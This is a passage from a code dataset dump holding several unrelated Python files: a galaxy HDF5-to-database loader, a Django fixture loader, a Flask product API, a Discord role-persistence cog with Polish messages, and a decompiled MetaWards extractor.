get_chunks(dimension_x):\n for block_y in get_chunks(dimension_y):\n pixel_data = pixel_group['pixels_{0}_{1}'.format(block_x, block_y)]\n\n size_x = get_size(block_x, dimension_x)\n size_y = get_size(block_y, dimension_y)\n\n x_offset = block_x * MAX_X_Y_BLOCK\n y_offset = block_y * MAX_X_Y_BLOCK\n data = pixel_data[:, :, parameter_id, statistic_id]\n\n # Copy the block back\n for x in range(size_x):\n for y in range(size_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x + x_offset,\n \"y\": y + y_offset,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n else:\n if 'pixels' in pixel_group.keys():\n pixel_data = pixel_group['pixels']\n data = pixel_data[:, :, parameter_id, statistic_id]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n # Bulk insert the data\n database_start = time.time()\n if len(insert_data) > 0:\n connection.execute(table.insert(), insert_data)\n\n # The stored count. Sometimes a pixel doesn't get processed so the pixel count won't match the stored count\n connection.execute(GALAXY.update().values(stored_count=stored_count).where(GALAXY.c.galaxy_id == galaxy_id))\n\n end_time = time.time()\n database_time = end_time - database_start\n total_time = end_time - start_time\n LOG.info(\n 'insert_sed_data, table: {0}, galaxy_id: {1}, total_time: {2:.3f}s, database_time: {3:.3f}s, inserts: {4}'.format(\n table,\n galaxy_id,\n total_time,\n database_time,\n len(insert_data)\n )\n )\n return total_time\n\n\ndef add_sed_data(connection, galaxy_id, h5_file, data_required):\n galaxy_group = h5_file['galaxy']\n pixel_group = galaxy_group['pixel']\n\n count = 0\n total_time = 0\n # For each pair insert the data\n for pair in data_required:\n with connection.begin():\n time_for_pair = insert_sed_data(\n connection,\n pair,\n pixel_group,\n galaxy_group.attrs['output_format'],\n galaxy_group.attrs['dimension_x'],\n galaxy_group.attrs['dimension_y'],\n galaxy_id\n )\n add_step_done_id(connection, galaxy_id, STEP_DONE_ID_SED_DATA, pair[0], pair[1])\n count += 1\n total_time += time_for_pair\n\n LOG.info(\n 'add_sed_data, galaxy_id: {0}, total_time: {1:.3f}s, average_time: {2:.3f}s'.format(\n galaxy_id,\n total_time,\n total_time / count if count > 0 else 0\n )\n )\n\n\ndef add_original_data(connection, galaxy_id, h5_file, data_required):\n galaxy_group = h5_file['galaxy']\n pixel_group = galaxy_group['pixel']\n\n count = 0\n total_time = 0\n # Add the original values\n for filter_name in data_required:\n with connection.begin():\n time_for_filter = insert_original_data(\n connection,\n filter_name,\n pixel_group,\n galaxy_group.attrs['output_format'],\n galaxy_group.attrs['dimension_x'],\n galaxy_group.attrs['dimension_y'],\n galaxy_id\n )\n add_step_done_id(connection, galaxy_id, STEP_DONE_ID_ORIGINAL_VALUES, filter_name)\n\n if time_for_filter > 0:\n count += 1\n total_time += time_for_filter\n\n LOG.info(\n 'add_original_data, galaxy_id: {0}, total_time: {1:.3f}s, average_time: {2:.3f}s'.format(\n galaxy_id,\n total_time,\n total_time / count if count > 0 else 0\n )\n )\n\n\ndef need_to_build_mask(connection, galaxy_id):\n mask = connection.execute(\n select([MASK]).where(MASK.c.galaxy_id == galaxy_id)\n ).first()\n if mask is None:\n return True\n\n count = connection.execute(\n select([func.count(MASK_POINT.c.mask_point_id)]).where(MASK_POINT.c.galaxy_id == galaxy_id)\n ).first()[0]\n\n return count == 0\n\n\ndef process_galaxy(connection, galaxies, verbosity, profile_name='aws-pogs'):\n \"\"\"\n Process the galaxies\n \"\"\"\n # Build the tables\n build_dynamic_tables(connection)\n\n for galaxy in galaxies:\n galaxy_id = galaxy[GALAXY.c.galaxy_id]\n steps_done = get_step_done_ids(\n connection,\n galaxy_id,\n [STEP_DONE_ID_NO_HDF5_FILE, STEP_DONE_ID_ORIGINAL_VALUES, STEP_DONE_ID_SED_DATA],\n True,\n True\n )\n\n # Work out what SED data is required\n data_required_sed = get_data_required_sed(connection, steps_done)\n data_required_original = get_data_required_original(steps_done)\n\n if len(data_required_sed) > 0 or len(data_required_original) > 0:\n # Copy the file from S3\n s3_helper = S3Helper(profile_name=profile_name)\n galaxy_id = int(galaxy[GALAXY.c.galaxy_id])\n galaxy_name = get_galaxy_file_name(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id)\n s3_name = os.path.join('{0:04d}000'.format(galaxy_id / 1000), galaxy_name) + '.hdf5'\n hdf5_file_name = os.path.join(FAST_DISK, galaxy_name) + '.hdf5'\n\n copy_ok = s3_helper.copy_file_to_disk(BUCKET_NAME, s3_name, hdf5_file_name)\n\n if copy_ok:\n h5_file = h5py.File(hdf5_file_name, 'r')\n LOG.info('Processing SED for name: {0}, run_id: {1}, galaxy_id: {2}'.format(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id))\n # Do we have anything to do?\n if len(data_required_sed) > 0:\n # noinspection PyBroadException\n try:\n # Store the SED fit values\n add_sed_data(connection, galaxy_id, h5_file, data_required_sed)\n except Exception:\n LOG.exception('An exception occurred in process_galaxy processing the SED values')\n else:\n if verbosity >= 1:\n LOG.info('Nothing to add - SED')\n\n if len(data_required_original) > 0:\n # noinspection PyBroadException\n try:\n add_original_data(connection, galaxy_id, h5_file, data_required_original)\n except Exception:\n LOG.exception('An exception occurred in process_galaxy processing the original values')\n else:\n if verbosity >= 1:\n LOG.info('Nothing to add - Original Data')\n\n # Clean up after ourselves\n h5_file.close()\n os.remove(hdf5_file_name)\n\n else:\n LOG.error('The file for name: {0}, run_id: {1}, galaxy_id: {2} does not exist'.format(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id))\n\n\ndef command_sqs(args):\n no_message_counter = 0\n while True:\n sqs_helper = SqsHelper('us-east-1')\n queue = sqs_helper.get_queue(QUEUE_LOAD_DATABASE)\n\n # No queue yet\n if queue is None:\n break\n\n # Read the message\n message = queue.read(wait_time_seconds=10)\n\n if message is None:\n if no_message_counter >= 5:\n break\n else:\n no_message_counter += 1\n else:\n # Get the galaxy id and delete the message\n galaxy_id = int(message.get_body())\n LOG.info('Galaxy id: {0}'.format(galaxy_id))\n\n queue.delete_message(message)\n\n no_message_counter = 0\n galaxies = []\n\n engine = create_engine(DB_LOGIN)\n connection = engine.connect()\n\n for galaxy in connection.execute(\n select([GALAXY]).where(GALAXY.c.galaxy_id == galaxy_id)):\n galaxies.append(galaxy)\n\n if len(galaxies) > 0:\n process_galaxy(connection, galaxies, args.verbosity)\n\n connection.close()\n\n\ndef command_galaxy(args):\n galaxy_ids = []\n for galaxy_id in args.galaxy_ids:\n if galaxy_id.find('-') > 1:\n list_range = galaxy_id.split('-')\n galaxy_ids.extend(range(int(list_range[0]), int(list_range[1]) + 1))\n else:\n galaxy_ids.append(int(galaxy_id))\n\n galaxies = []\n\n engine = create_engine(DB_LOGIN)\n connection = engine.connect()\n\n for galaxy_id in galaxy_ids:\n galaxy = connection.execute(\n select([GALAXY]).where(GALAXY.c.galaxy_id == galaxy_id)\n ).first()\n if galaxy is not None:\n galaxies.append(galaxy)\n\n if len(galaxies) > 0:\n process_galaxy(connection, galaxies, args.verbosity)\n\n connection.close()\n\n\ndef main():\n parser = argparse.ArgumentParser('Get the data from the HDF5 files of theSkyNet POGS and store it in the database')\n subparsers = parser.add_subparsers()\n\n parser_sqs = subparsers.add_parser('sqs', help='SQS help')\n parser_sqs.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser_sqs.set_defaults(func=command_sqs)\n\n parser_galaxy = subparsers.add_parser('galaxy', help='galaxy help')\n parser_galaxy.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser_galaxy.add_argument('galaxy_ids', nargs='+', help='the galaxy ids or 4-30 if you need a range')\n parser_galaxy.set_defaults(func=command_galaxy)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n if not pidfile_exists(PATH_TO_PIDFILE):\n main()\n os.remove(PATH_TO_PIDFILE)\n","sub_path":"src/load_database.py","file_name":"load_database.py","file_ext":"py","file_size_in_byte":21269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621730507","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom hub.formats import Format\n\n\"\"\"\nFixture loading command. We don't use django fixtures because we want to verify that the input data are actually\nparseable.\n\nUsage:\n ./manage.py loadfixtures [--no-perfdata]\n\"\"\"\n\nimport logging\n\nfrom django.core.management.base import BaseCommand\nfrom django import db\nimport codecs\n\nfrom django.db import connection\nfrom hub.models import PackageModel\n\nfrom hub.tests.testutils import TestBase\nfrom hub.models import DocumentModel, FileGroupModel, FileModel, UrlModel, TransformationModel\nfrom hub import formats\nfrom hub.structures.file import FileGroup\nfrom hub.utils.odhql import TransformationUtil\n\nfrom hub.odhql.interpreter import OdhQLInterpreter\n\nlogging.getLogger('django.db.backends').setLevel(logging.WARN)\nfrom optparse import make_option\n\n\nclass Command(BaseCommand):\n help = 'Loads test data into the database'\n\n option_list = BaseCommand.option_list + (\n make_option('--no-perfdata', action='store_true', default=False, help='Do not import large dataset'),)\n\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__()\n self.parse = kwargs.get('parse', True)\n\n IMPORT = [\n # first element in considered the main file\n (formats.CSV, 'mockaroo.com.csv',),\n (formats.JSON, 'mockaroo.com.json',),\n (formats.Excel, 'mockaroo.com.xlsx',),\n (formats.GML, 'gml/Bahnhoefe.gml', 'gml/Bahnhoefe.gfs', 'gml/Bahnhoefe.xsd',),\n (formats.GeoJSON, 'json/Bahnhoefe.json',),\n (formats.KML, 'kml/Bahnhoefe.kml',),\n (formats.Shapefile, 'shp/Bahnhoefe.shp', 'shp/Bahnhoefe.shx', 'shp/Bahnhoefe.dbf', 'shp/Bahnhoefe.ili'),\n (formats.Excel, 'trobdb/Baustellen Februar 2015.xls',),\n (formats.GML, 'trobdb/TbaBaustellenZHWFS.gml', 'trobdb/TbaBaustellenZHWFS.xsd'),\n (formats.GeoJSON, 'trobdb/tiefbaustelle.json',),\n (formats.XML, 'trobdb/truckinfo.xml',),\n (formats.KML, 'trobdb/Baustellen.kml',),\n (formats.INTERLIS1, 'itf/Bahnhoefe.ili', 'itf/Bahnhoefe.itf'),\n (formats.Excel, 'trobdb/Baustellen Mai 2015.xls',),\n (formats.Shapefile,) + tuple(\n 'mopub/GEB_Gebaeudeeingang.{}'.format(ext) for ext in ['dbf', 'prj', 'shp', 'shx']),\n (formats.CSV, 'mopub/myaddresses2.utf8.csv',),\n (formats.CSV, 'geocsv_point_xy/bahnhoefe_point_xy.csv', 'geocsv_point_xy/bahnhoefe_point_xy.csvt',\n 'geocsv_point_xy/bahnhoefe_point_xy.prj'),\n # Interlis 2 support was disabled - see documentation\n # ('interlis1/Bahnhoefe.ili', 'interlis1/Bahnhoefe.xml'): formats.INTERLIS2\n ]\n\n URLS = [\n ('http://maps.zh.ch/wfs/HaltestellenZHWFS', 'Haltestellen öffentlicher Verkehr ZH', formats.WFS),\n ('http://maps.zh.ch/wfs/TbaBaustellenZHWFS', 'Baustellen Kantonsstrassen ZH', formats.WFS)\n ]\n\n TRANSFORMATIONS = [\n ('trobdb/BaustellenExcel.odhql', 'TROBDB: Baustellen Februar 2015'),\n ('trobdb/tiefbaustelle-zh.odhql', 'TROBDB: Tiefbaustellen ZH (aus GeoJSON)'),\n ('trobdb/TruckInfo.odhql', 'TROBDB: TruckInfo'),\n ('trobdb/WFS-Baustellen-ZH.odhql', 'TROBDB: Baustellen Zürich (WFS)'),\n ('trobdb/Sanitize-Baustellen-kml.odhql', 'Sanitize Baustellen.kml'),\n ('trobdb/Baustellen-kml.odhql', 'TROBDB: Baustellen.kml'),\n ('trobdb/trobdb-union.odhql', 'TROBDB: Alle Daten'),\n ('mopub/myaddresses-geometry.odhql', 'MOPUB: Adressen mit Geometrie'),\n ]\n\n def add_document(self, desc, format, name):\n \"\"\" Adds a document to the database. \"\"\"\n if len(name) > 200:\n name = name[:197] + '...'\n\n desc = desc or 'Testdaten'\n doc = DocumentModel(name=name,\n description=desc + ' (Originalformat: {})'.format(format.name),\n private=False, owner=self.user)\n doc.save()\n return doc\n\n def add_fg(self, fg, format, name=None, desc=None):\n \"\"\" Adds and parses a file group. \"\"\"\n doc = self.add_document(desc, format, name or 'Test {}'.format(', '.join(fg.names)))\n\n file_group = FileGroupModel(document=doc)\n file_group.save()\n\n for f in fg:\n concrete_format = Format.identify(f)\n assert concrete_format in (None, format, formats.Other)\n file_model = FileModel(file_name=f.name, data=f.stream.getvalue(), file_group=file_group,\n format=concrete_format.name)\n file_model.save()\n\n if self.parse and format != formats.Other:\n file_group.to_file_group().to_df() # force parse & caching\n\n db.reset_queries()\n\n def add_url(self, url, format, name=None, desc=None):\n \"\"\" Adds and parses a url. \"\"\"\n doc = self.add_document(desc, format, name or 'Test {}'.format(url))\n\n file_group = FileGroupModel(document=doc)\n file_group.save()\n\n url_model = UrlModel(source_url=url, type='wfs' if format is formats.WFS else 'auto', file_group=file_group,\n refresh_after=3600)\n url_model.save()\n\n if self.parse and format != formats.Other:\n file_group.to_file_group().to_df() # force parse & caching\n\n def add_transformation(self, file, name, desc=None):\n \"\"\" Adds and executes a transformation. \"\"\"\n with codecs.open(file, 'r', 'utf-8') as f:\n transformation = TransformationModel(name=name, description=desc or name,\n transformation=unicode(f.read()),\n owner=self.user)\n transformation.save()\n\n file_groups, transformations = OdhQLInterpreter.parse_sources(transformation.transformation)\n\n if file_groups and len(file_groups) > 0:\n transformation.referenced_file_groups = FileGroupModel.objects.filter(id__in=file_groups.values())\n\n if transformations and len(transformations) > 0:\n transformation.referenced_transformations = TransformationModel.objects.filter(\n id__in=transformations.values())\n\n if self.parse:\n TransformationUtil.df_for_transformation(transformation, self.user.id)\n\n def handle(self, *args, **options):\n \"\"\" Entrypoint for django-admin. \"\"\"\n\n if not options.get('no_perfdata', False):\n self.__class__.IMPORT += (\n (formats.CSV, 'perf/employees.csv',),\n (formats.CSV, 'perf/children.csv',),\n )\n\n self.user = TestBase.get_test_user()\n\n for args in self.IMPORT:\n it = iter(args)\n format = next(it)\n fg = FileGroup.from_files(*[TestBase.get_test_file_path(f) for f in it])\n\n self.add_fg(fg, format)\n\n self.update_ids(1000)\n\n for (url, name, format) in self.URLS:\n self.add_url(url, format, name=name)\n\n self.update_ids(2000)\n\n for (file, name) in self.TRANSFORMATIONS:\n self.add_transformation(TestBase.get_test_file_path(file), name)\n\n self.update_ids(3000)\n\n # self.add_multiple(FileGroup.from_files(TestBase.get_test_file_path('perf/employees.csv')), formats.CSV, 5)\n self.add_multiple(FileGroup.from_files(TestBase.get_test_file_path('mockaroo.com.json')), formats.JSON, 10)\n\n self.update_ids(4000)\n\n def add_multiple(self, fg, format, n=100):\n \"\"\" Adds filler data for paging tests. \"\"\"\n for i in xrange(n):\n self.add_fg(fg, format, name='Dummy', desc='Filler data')\n\n def update_ids(self, new_value):\n \"\"\" Updates sequences, so that the different groups start at fixed points each. \"\"\"\n cursor = connection.cursor()\n\n cursor.execute('select setval(\\'{}_id_seq\\', {})'.format(PackageModel._meta.db_table, new_value))\n cursor.execute('select setval(\\'{}_id_seq\\', {})'.format(FileGroupModel._meta.db_table, new_value))\n\n cursor.close()\n","sub_path":"src/main/python/hub/management/commands/loadfixtures.py","file_name":"loadfixtures.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582940668","text":"from http import HTTPStatus\n\nfrom flask import Flask, request, jsonify\nfrom flask.json import JSONEncoder\nfrom sqlalchemy import exists\nfrom sqlalchemy_utils import database_exists\nfrom sqlalchemy.ext.declarative import DeclarativeMeta\n\nfrom database.database import db_session, init_db\nfrom database.models.models import Product\nfrom system_config import (ALL_FIELDS, BASE_FIELDS, BILL_OF_MATERIALS, DUPLICATE_PRODUCT, GROUP, INCORRECT_DATA,\n INDEPENDENT, INDUSTRY_DEPENDENT, INDUSTRY_KEYS, MATERIALS, MESSAGES, MULTI_RELATIONS,\n NO_JSON, PRODUCT_CONFIG, PRODUCT_CREATED, PRODUCT_DEPENDENT, PRODUCT_GROUP, SINGLE_RELATIONS,\n TABLE_NAMES, UNKNOWN_API_KEY)\nfrom utils import get_or_create, get_or_create_multiple, get_class_by_table_name\n\n\nclass CustomJSONEncoder(JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj.__class__, DeclarativeMeta):\n return obj.to_dict()\n return super(CustomJSONEncoder, self).default(obj)\n\n\napp = Flask(__name__)\napp.json_encoder = CustomJSONEncoder\n\nif not database_exists('sqlite:///products.db'):\n init_db()\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n\nclass ProductCreator:\n \"\"\"\n Use this class to ease product creation.\n \"\"\"\n\n def __init__(self, data, product_type):\n self.data = data\n self.product_type = product_type\n self.objects = {}\n self.product_config = PRODUCT_CONFIG[product_type]\n\n def get_json_fields(self):\n \"\"\"\n Obtain a set of json fields supplied by the user.\n :return: set, set of fields in the json data.\n \"\"\"\n json_fields = set()\n for field in self.data:\n json_fields.add(field)\n return json_fields\n\n def check_all_fields_present(self, json_fields):\n \"\"\"\n Confirm all required fields present in json data supplied by the user.\n :param json_fields: set, set of json fields against which we need to make the check.\n :return: bool, True if all fields present, False otherwise.\n \"\"\"\n all_fields = set(self.product_config[ALL_FIELDS])\n return all_fields == json_fields\n\n def _cleanse_data(self):\n \"\"\"\n Convert json field names to system names (for family/range -> group and billOfMaterials -> materials).\n \"\"\"\n product_group = self.product_config[PRODUCT_GROUP]\n self.data[GROUP] = self.data[product_group]\n del(self.data[product_group])\n self.data[MATERIALS] = self.data[BILL_OF_MATERIALS]\n del(self.data[BILL_OF_MATERIALS])\n\n def _create_base_product(self):\n \"\"\"\n Creates base product without relationships that require its existence formerly. Needs objects from\n INDEPENDENT object names to exist first. Product is then flushed to the database but not committed.\n :return: product, instance of a product\n \"\"\"\n product_class = get_class_by_table_name(f'{self.product_type}_product')\n if product_class:\n # build kwargs for product\n product_kwargs = {}\n for field in self.product_config[BASE_FIELDS]:\n if field in self.product_config[SINGLE_RELATIONS]:\n product_kwargs[field] = self.objects[field]\n else:\n product_kwargs[field] = self.data[field]\n product, _ = get_or_create(product_class, **product_kwargs)\n db_session.add(product)\n db_session.flush()\n self.objects['product_id'] = product.id\n return product\n raise ValueError('Unknown product class')\n\n def _create_objects(self, object_names):\n \"\"\"\n Create objects from a list of object names.\n :param object_names: list, List of object names\n :return:\n \"\"\"\n for obj_name in object_names:\n if self.data.get(obj_name):\n data = self.data[obj_name]\n multiple = False\n if isinstance(data, list) or isinstance(data, dict):\n multiple = True\n table_name = TABLE_NAMES[obj_name]\n object_class = get_class_by_table_name(table_name)\n\n if object_class:\n if multiple:\n # inject product id into data dictionary for objects that need it as a field.\n if obj_name in self.product_config[PRODUCT_DEPENDENT]:\n for key, value in data.items():\n value['product_id'] = self.objects['product_id']\n self.objects[obj_name] = get_or_create_multiple(object_class, data=data)\n db_session.add_all(self.objects[obj_name])\n else:\n self.objects[obj_name], _ = get_or_create(object_class, name=self.data[obj_name])\n db_session.add(self.objects[obj_name])\n\n def create_product_from_data(self):\n \"\"\"\n Creates product and required objects it depends on from data.\n \"\"\"\n # Normalize field names to system names.\n self._cleanse_data()\n # create independent objects first: tags, group (family, range), customer as they do not need\n # anything to exist.\n self._create_objects(self.product_config[INDEPENDENT])\n\n # create product dependencies in database (ids will be needed to save the product object in next step)\n db_session.flush()\n base_product = self._create_base_product()\n # now create product dependent objects (those need product_id.\n self._create_objects(self.product_config[PRODUCT_DEPENDENT])\n\n # create industry specific dependent objects.\n multi_relations = self.product_config[MULTI_RELATIONS]\n if self.product_config.get(INDUSTRY_DEPENDENT):\n industry_dependent_relations = self.product_config[INDUSTRY_DEPENDENT]\n self._create_objects(industry_dependent_relations)\n multi_relations.extend(industry_dependent_relations)\n # append dependent objects to product\n for relation in multi_relations:\n # add objects to appropriate fields\n getattr(base_product, relation).extend(self.objects[relation])\n db_session.commit()\n\n\n@app.route('/products', methods=['GET', 'POST'])\ndef products():\n product_type = request.headers['X-API-KEY']\n # confirm correct API key used.\n if product_type not in INDUSTRY_KEYS:\n return MESSAGES[UNKNOWN_API_KEY], HTTPStatus.FORBIDDEN\n if request.method == 'POST':\n json_data = request.get_json()\n # Abort if no data supplied.\n if json_data is None:\n return MESSAGES[NO_JSON], HTTPStatus.BAD_REQUEST\n product_name = json_data.get('name')\n # Abort if product already exists.\n if product_name and db_session.query(exists().where(Product.name == product_name)).scalar():\n return MESSAGES[DUPLICATE_PRODUCT], HTTPStatus.BAD_REQUEST\n\n product_creator = ProductCreator(data=json_data, product_type=product_type)\n # confirm all fields present before doing any work.\n # TODO: add info for customer - which fields are missing in the message.\n json_fields = product_creator.get_json_fields()\n if not product_creator.check_all_fields_present(json_fields):\n return MESSAGES[INCORRECT_DATA], HTTPStatus.BAD_REQUEST\n\n product_creator.create_product_from_data()\n\n return MESSAGES[PRODUCT_CREATED], HTTPStatus.CREATED\n else:\n # Retrieve all products here\n product_class = get_class_by_table_name(f'{product_type}_product')\n if product_class:\n retrieved_products = product_class.query.all()\n return jsonify(retrieved_products)\n return MESSAGES[UNKNOWN_API_KEY], HTTPStatus.NOT_FOUND\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80135588","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport typing\n\nimport discord\nfrom discord.ext import commands\n\nfrom cogs.helpers import checks\n\nif typing.TYPE_CHECKING:\n from cogs.helpers.BamboBot import BamboBot\n\nfrom cogs.helpers.context import CustomContext\n\nclass RolePersist(commands.Cog):\n \"\"\"\n Przywracanie ról (RolePersist)\n \"\"\"\n\n def __init__(self, bot: 'BamboBot'):\n self.bot = bot\n self.api = bot.api\n\n async def is_role_persist_enabled(self, guild:discord.Guild):\n return await self.bot.settings.get(guild, \"rolepersist_enable\") and await self.bot.settings.get(guild, \"vip\")\n\n async def get_restorable_roles(self, guild, roles):\n my_top_role = guild.me.top_role\n\n restorable_roles = []\n for role in roles:\n if role < my_top_role:\n restorable_roles.append(my_top_role)\n\n async def log_role_persist(self, guild, member, roles_to_give):\n roles_to_give_names = [r.name for r in roles_to_give]\n roles_to_give_mentions = [r.mention for r in roles_to_give]\n\n\n reason = f\"Przywracanie ról dla {member.name}#{member.discriminator} w {guild}: {len(roles_to_give)} role do nadania: {roles_to_give_names}\"\n self.bot.logger.info(reason)\n\n logging_channel = await self.bot.get_cog('Logging').get_logging_channel(member.guild, \"logs_rolepersist_channel_id\")\n\n if not logging_channel:\n return 'No logging channel configured for RolePersist.'\n if not await self.bot.get_cog('Logging').perms_okay(logging_channel):\n return 'No permissions to log'\n embed = discord.Embed(title=f\"{member.name}#{member.discriminator} dołączył\",\n colour=discord.Colour.dark_blue(),\n description=f\"Nadano {len(roles_to_give)} ról\\n\"\n f\"{', '.join(roles_to_give_mentions)}\"\n )\n\n embed.set_author(name=\"Przywrócenie Ról\", url=\"https://bambobot.herokuapp.com\") # , icon_url=\"ICON_URL_DELETE\")\n\n embed.timestamp = datetime.datetime.utcnow()\n\n embed.set_footer(text=\"Role przywrócone\",\n icon_url=\"https://cdn.discordapp.com/avatars/552611724419792907/fded780340148db800e317cb4b417b88.png\")\n\n await logging_channel.send(embed=embed)\n\n @commands.command(hidden=True)\n @commands.guild_only()\n @checks.bot_have_permissions()\n @checks.have_required_level(8)\n async def clear_rp(self, ctx: 'CustomContext'):\n async with ctx.typing():\n guild = ctx.guild\n\n count = 0\n m_count = len(guild.members)\n cmc = 0\n hits = 0\n logs = ''\n to_delete = []\n msg = await ctx.send('**Usuwam niepotrzebne wpisy zapisanych ról...** \\n\\n\\nPobieram wszystkie wpisy dla serwera...')\n res = await self.api.get_stored_roles(guild, self.bot.user)\n rows = res['rows']\n rows_len = len(rows)\n logs = (f'**Usuwam niepotrzebne wpisy zapisanych ról...** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n\\n'\n f'Porównuję listę użytkowników serwera do listy wpisów...')\n await msg.edit(content=logs)\n for i, member in enumerate(guild.members, start=1):\n if member.id in rows:\n cmc = i\n hits += 1\n to_delete.append(member.id)\n if i % 100 == 0:\n await msg.edit(content=logs + f'\\nSprawdzono `{i}/{m_count}` członków. \\nTrafiono `{hits}/{rows_len}` porównań')\n logs = (f'**Usuwam niepotrzebne wpisy zapisanych ról...** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n'\n f'Porównano listę użytkowników do listy wpisów. \\n'\n f'Sprawdzono `{cmc}/{m_count}` członków. \\n'\n f'Trafiono `{hits}/{rows_len}` porównań.\\n\\n'\n f'Usuwam wpisy z bazy...')\n await msg.edit(content=logs)\n for i, member_id in enumerate(to_delete, start=1):\n member = guild.get_member(member_id)\n await self.api.delete_stored_roles(guild, member)\n count += 1\n if i % 100 == 0:\n await msg.edit(content=logs + f'\\nUsunięto `{count}/{len(to_delete)}` wpisów...')\n logs = (f'**Usunięto niepotrzebne wpisy zapisanych ról!** \\n\\n\\n'\n f'Ilość wpisów dla serwera: `{rows_len}` \\n'\n f'Porównano listę użytkowników do listy wpisów. \\n'\n f'Sprawdzono `{cmc}/{m_count}` członków. \\n'\n f'Trafiono `{hits}/{rows_len}` porównań.\\n\\n'\n f'Usunięto wpisy z bazy.\\n'\n f'Usunięto `{count}/{len(to_delete)}` wpisów.')\n await msg.edit(content=logs)\n\n # for i, member in enumerate(guild.members, start=1):\n # roles = await self.api.get_stored_roles(guild, member)\n # cmc = i\n # if len(roles) == 0:\n # pass\n # else:\n # await self.api.delete_stored_roles(guild, member)\n # count += 1\n # await msg.edit(content=f'🔁 Przetworzono `{i}/{m_count}` członków. \\n⏰ Usunięto `{count}` wpisów...')\n \n # await msg.edit(content=f'🔁 Przetworzono `{cmc}/{m_count}` członków. \\n✅ Usunięto `{count}` wpisów!')\n \n\n @commands.Cog.listener()\n async def on_member_join(self, member: discord.Member):\n guild = member.guild\n if not await self.is_role_persist_enabled(guild):\n return\n\n # print('getting stored roles')\n roles_to_give = await self.api.get_stored_roles(guild, member)\n # print(f'roles_to_give = {roles_to_give}')\n if len(roles_to_give) < 2:\n return\n await self.api.delete_stored_roles(guild, member)\n await member.edit(roles=roles_to_give, reason=\"Przywracanie ról\")\n await self.log_role_persist(guild, member, roles_to_give)\n\n @commands.Cog.listener()\n async def on_member_remove(self, member: discord.Member):\n guild = member.guild\n if not await self.is_role_persist_enabled(guild):\n return\n # print('saving roles to give')\n self.bot.logger.debug(f\"Użytkownik `{member}` opuścił serwer `{member.guild}`\")\n if len(member.roles) == 1:\n self.bot.logger.debug(f'Użytkownik `{member}` miał tylko jedną rolę (@everyone) - nie zapisuję')\n return\n elif len(member.roles) > 1:\n self.bot.logger.debug(f'Zapisuję {len(member.roles)} ról')\n await self.api.save_roles(guild, member, member.roles)\n # print(f'member.roles = {member.roles}')\n\n\n\n\ndef setup(bot: 'BamboBot'):\n bot.add_cog(RolePersist(bot))\n\n'''\nChanges by me:\n(1) Translated to polish\n(2) Changed embed url=\n(3) Changed embed icon_url=\n(4) Changed role persist so that the roles are not stored if the user had only one role (the default @everyone)\n=====\nMoje zmiany:\n(1) Przetłumaczono na polski\n(2) Zmieniono url= osadzenia\n(3) Zmieniono icon_url= osadzenia\n(4) Zmieniono trwałość ról w taki sposób, że role użytkownika nie są zapisywane, jeżeli posiadał on tylko jedną rolę (domyślną @everyone)\n'''","sub_path":"cogs/role_persist.py","file_name":"role_persist.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104357352","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/chris/GitHub/MetaWards/build/lib.macosx-10.9-x86_64-3.7/metawards/extractors/_extract_default.py\n# Compiled at: 2020-04-20 09:02:59\n# Size of source mod 2**32: 1410 bytes\n__all__ = ['extract_default']\n\ndef extract_default(nthreads: int=1, setup=False, **kwargs):\n \"\"\"This returns the default list of 'output_XXX' functions that\n are called in sequence for each iteration of the model run.\n These functions are used to output data to files for\n future processing\n\n Parameters\n ----------\n nthreads: int\n The number of threads that will be used for each function.\n If this is 1, then the serial versions of the functions will\n be returned, else the parallel (OpenMP) versions will be\n returned\n setup: bool\n Whether or not to return the functions used to setup the\n space and output files for the output_XXX functions returned by\n this iterator. This is called once at the start of a run\n to return the functions that must be called to setup the\n model\n\n Returns\n -------\n funcs: List[function]\n The list of functions that ```extract_data``` will call in sequence\n \"\"\"\n if setup:\n from ._output_default import setup_output_default\n funcs = [\n setup_output_default]\n else:\n if nthreads is None or nthreads == 1:\n from ._output_default import output_default\n funcs = [\n output_default]\n else:\n from ._output_default import output_default_omp\n funcs = [\n output_default_omp]\n return funcs","sub_path":"pycfiles/metawards-0.8.5-cp37-cp37m-macosx_10_9_x86_64/_extract_default.cpython-37.py","file_name":"_extract_default.cpython-37.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257609998","text":"import document\nimport sentence\nimport documentStreamError as dse\nimport 